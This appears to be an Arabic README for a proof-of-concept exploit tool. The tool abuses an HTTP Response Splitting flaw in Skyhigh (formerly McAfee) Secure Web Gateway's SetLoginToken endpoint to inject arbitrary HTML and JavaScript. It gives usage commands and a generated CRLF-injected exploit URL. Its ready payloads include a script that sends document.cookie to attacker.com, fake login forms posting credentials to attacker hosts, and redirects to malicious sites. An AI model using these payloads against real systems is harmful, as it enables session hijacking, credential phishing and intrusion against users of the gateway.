
بوابة الويب الآمنة 10.2.11 - البرمجة النصية عبر المواقع (XSS)
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
بواسطة 0PTS
إثبات مفهوم لثغرة HTTP Response Splitting في Skyhigh Secure Web Gateway (المعروفة سابقًا باسم McAfee Web Gateway).
ثغرة حرجة من نوع HTTP Response Splitting في Skyhigh Secure Web Gateway، تسمح بتنفيذ هجمات XSS عن بعد عبر حقن كود HTML/JavaScript عشوائي.
توجد الثغرة في المكوّن الإضافي "Ssos" (الإجراء SetLoginToken)، الذي يعالج معلمات URL بشكل غير صحيح:
نظرًا لعدم تعقيم أحرف السطر الجديد (\r\n / %0d%0a)، يمكن للمهاجم:
Content-Type و Content-Lengthيتجاهل المتصفح باقي محتوى الاستجابة بعد تحديد Content-Length بشكل صحيح، مما يسمح باستبدال المحتوى المعروض بالكامل.
python explot.py
# XSS أساسي
python explot.py -d example.com -p "<script>alert(document.domain)</script>"
# إعادة توجيه
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'
# نموذج تصيد
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'
# عنوان URL فقط (وضع هادئ)
python explot.py -d example.com -p "<script>alert(1)</script>" -q
-d, --domain النطاق المستهدف (الافتراضي: google.com)
-x, --prefix بادئة مسار URL (الافتراضي: مسار SWG الداخلي)
-p, --payload حمولة HTML/JavaScript
-q, --quiet وضع هادئ - عنوان URL فقط
-v, --version إصدار البرنامج النصي
-h, --help المساعدة
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
[+] Target Domain: example.com
[+] Payload Length: 43 bytes
[+] URL Length: 234 chars
[+] Generated URL:
http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mwg-internal/*⚠️ تنبيه: هذه الأداة مخصصة حصريًا لـ:
استخدامها ضد أنظمة دون إذن صريح من المالك غير قانوني.
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝